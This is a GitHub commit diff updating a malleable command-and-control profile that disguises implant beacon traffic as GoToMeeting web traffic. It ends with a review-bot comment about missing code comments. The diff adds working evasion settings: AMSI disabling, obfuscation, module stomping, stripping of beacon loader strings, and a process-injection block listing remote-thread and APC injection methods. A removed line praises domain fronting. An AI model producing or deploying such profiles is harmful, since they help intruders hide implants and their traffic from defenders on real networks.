updated to work with 3.14.

xx0hcd 2019-05-10 09:21:37 -05:00 committed by GitHub
parent 293374fe70
commit f1c591306d
1 changed files with 67 additions and 35 deletions


@ -1,5 +1,5 @@
#gotomeeting profile #gotomeeting profile
#works good using Cloudfront with domain fronting, especially since Cloudfront doesn't verify the CNAME you enter... #updated for 3.14
#this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts. #this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts.
#xx0hcd #xx0hcd
@ -12,14 +12,13 @@ set maxdns "245";
set sample_name "gotomeeting.profile"; set sample_name "gotomeeting.profile";
#https-certificate { #https-certificate {
# set keystore "your_store_file.store"; # set keystore "your_store_file.store";
# set password "your_store_pass"; # set password "your_store_pass";
#} #}
#ordering server response headers, from 3.13.
http-config { http-config {
set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection"; set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection";
header "Content-Type" "text/html;charset=UTF-8"; header "Content-Type" "text/html;charset=UTF-8";
header "Connection" "close"; header "Connection" "close";
header "Brightspot-Id" "00000459-72af-a783-feef2189"; header "Brightspot-Id" "00000459-72af-a783-feef2189";
header "Cache-Control" "max-age=2"; header "Cache-Control" "max-age=2";
@ -27,6 +26,8 @@ http-config {
header "X-Content-Type-Options" "nosniff"; header "X-Content-Type-Options" "nosniff";
header "X-Powered-By" "Brightspot"; header "X-Powered-By" "Brightspot";
header "Vary" "Accept-Encoding"; header "Vary" "Accept-Encoding";
set trust_x_forwarded_for "false";
} }
http-get { http-get {
@ -36,10 +37,10 @@ http-get {
client { client {
#set Host header to whatever #set Host header to whatever
# header "Host" "whatever.gotomeeting.com"; # header "Host" "whatever.gotomeeting.com";
header "Accept" "*/*"; header "Accept" "*/*";
header "Accept-Language" "en-US"; header "Accept-Language" "en-US";
header "Connection" "close"; header "Connection" "close";
metadata { metadata {
base64url; base64url;
@ -93,10 +94,10 @@ http-post {
client { client {
#set Host header to whatever #set Host header to whatever
# header "Host" "whatever.gotomeeting.com"; # header "Host" "whatever.gotomeeting.com";
header "Accept" "*/*"; header "Accept" "*/*";
header "Accept-Language" "en"; header "Accept-Language" "en";
header "Connection" "close"; header "Connection" "close";
output { output {
base64url; base64url;
@ -152,11 +153,10 @@ http-stager {
set uri_x64 "/Meeting/32251816/"; set uri_x64 "/Meeting/32251816/";
client { client {
#set Host header to whatever, probably using stageless anyway right? # header "Host" "whatever.gotomeeting.com";
# header "Host" "whatever.gotomeeting.com"; header "Accept" "*/*";
header "Accept" "*/*"; header "Accept-Language" "en-US";
header "Accept-Language" "en-US"; header "Connection" "close";
header "Connection" "close";
} }
server { server {
@ -169,11 +169,18 @@ http-stager {
###Malleable PE Options### ###Malleable PE Options###
#always test spawnto and module stomp before using. My examples tested on Windows 10 Pro. #always test spawnto and module stomp before using. My examples tested on Windows 10 Pro.
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; post-ex {
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
#attempt to disable amsi for execute-assembly, powerpick, and psinject from 3.13 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set amsi_disable "true"; set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}
#used peclone on wwanmm.dll. #used peclone on wwanmm.dll.
#don't use 'set image_size_xx' if using 'set module_xx' #don't use 'set image_size_xx' if using 'set module_xx'
@ -194,18 +201,43 @@ stage {
#module stomp #module stomp
set module_x86 "wwanmm.dll"; set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll"; set module_x64 "wwanmm.dll";
transform-x86 { transform-x86 {
prepend "\x90\x90\x90"; prepend "\x90\x90\x90";
strrep "ReflectiveLoader" ""; strrep "ReflectiveLoader" "";
strrep "beacon.dll" ""; strrep "beacon.dll" "";
} }
transform-x64 { transform-x64 {
prepend "\x90\x90\x90"; prepend "\x90\x90\x90";
strrep "ReflectiveLoader" ""; strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" ""; strrep "beacon.x64.dll" "";
} }
}
process-inject {
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
} }
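Review bot: The new `post-ex` and `process-inject` blocks in the `@ -169,11 +169,18 @@` and `@ -194,18 +201,43 @@` hunks carry no comment at all, while every other section of this profile has a `#` line stating which release an option dates from and what it is for, so a reader cannot tell from the file why these blocks were added. Suggest one line above each new block, e.g. `#post-ex block, added for 3.14.` and `#process-inject block, added for 3.14.`, and a short note on what each `set` inside them controls, as was done for `module_x86`/`module_x64`. It also looks as though the comments for two settings that were kept are dropped (`#ordering server response headers, from 3.13.` in the `@ -12,14 +12,13 @@` hunk, above `set headers`, and the `#attempt to disable amsi ...` line above the moved `set amsi_disable`); the old/new sides are not marked on this page, so that is inferred from the line counts, but if so, those comments should move with their settings rather than disappear. The `stage {` block that the last hunk edits starts outside the hunk, and the `post-ex` block sits inside a region whose indentation is not visible here.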